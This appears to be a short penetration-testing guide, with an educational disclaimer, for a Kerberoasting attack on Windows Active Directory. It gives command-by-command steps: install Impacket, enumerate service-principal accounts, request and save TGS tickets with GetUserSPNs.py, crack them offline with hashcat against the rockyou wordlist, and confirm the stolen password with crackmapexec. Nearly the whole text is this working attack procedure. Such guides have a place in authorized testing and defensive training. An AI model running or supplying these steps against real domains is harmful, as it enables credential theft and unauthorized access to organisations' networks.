Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity

Step 1: Set Up Impacket Tools

1. Clone the Impacket repository:
   

   git clone https://github.com/SecureAuthCorp/impacket.git
   

2. Navigate to the Impacket directory:
   

   cd impacket
   

3. Install Impacket using pip:
   

   sudo python3 -m pip install .
   

Step 2: List Accounts and Request TGS Tickets

1. List SPN accounts:
   

   GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME]
   

2. Request TGS tickets:
   

   GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request
   

Step 3: Request Specific TGS Tickets and Save to File

1. Request a specific TGS ticket:
   

   GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request-user [SPN-USERNAME]
   

2. Save TGS tickets to a file:
   

   GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request-user [SPN-USERNAME] -outputfile [OUTPUT-FILE]
   

Step 4: Crack TGS Tickets and Confirm Access

1. Crack TGS tickets offline:
   

   hashcat -m 13100 [TGS-FILE] /usr/share/wordlists/rockyou.txt
   

2. Confirm access with the cracked credentials:
   

   crackmapexec smb [DC-IP] -u [USERNAME] -p [PASSWORD]